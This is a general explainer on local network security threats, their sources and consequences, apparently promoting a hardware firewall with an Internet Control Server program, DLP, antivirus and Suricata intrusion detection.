Sources of threats to the network can be both external and internal. The obvious external source is the Internet. Even if users of the local network do not have direct access to the Internet, they can use mail services and receive information from outside whose security is not guaranteed. Strictly speaking, the Internet is not a source of threat but a medium through which malicious information enters the local network. The initiators of threats can be unscrupulous partners, criminal or, conversely, law enforcement agencies, hackers, even the provider's technical staff. The internal danger lies in the deliberate introduction of malicious software by employees of the enterprise, or in the creation of conditions for its introduction. The hierarchical level of the employee has practically no significance here. The low-quality or outdated hardware and software used for information processing must also be considered as an internal potential source of threat: the vulnerability of these components can negate the security of a computer network.

The consequences of insufficient data protection on the network are manifold - theft, destruction or distribution of confidential information (trade secrets), personal data, substitution of information, blocking access to it, limitation of functionality or complete shutdown of the corporate network. The latter leads to the actual stop of business processes.

Protection Options

Protecting computer networks is essential. It must be understood that a security threat of one scale or another always exists. Whether it is realized or not depends on how the network is organized and what methods of protecting the local network are used. A LAN security system becomes reliable when it uses hardware of sufficient performance and high-quality software with transparent management: the user must understand what he is doing and why. In the case of a corporate network, a hardware firewall is an adequate solution. Together with the installed Internet Control Server (ICS) program, it implements a comprehensive countermeasure against external and internal threats. Traffic (including internal traffic) passing through the network gateway is continuously analyzed by the built-in network protection tools. The DLP module filters possible information leaks, and the streaming antivirus detects malware even before it reaches the network's computers. The Suricata attack detector captures potentially malicious activity on the network. The connection monitor shows the traffic flows from each client. Many of the network security components are easily configured, their operation becomes clear even to a non-specialist, and such a program is easy to manage.

It is the high level of security of the local network that makes a working environment out of many interacting computers that allows the enterprise to function normally. A network protection program should be complex and modern inside, but simple and understandable at the level of user interaction.
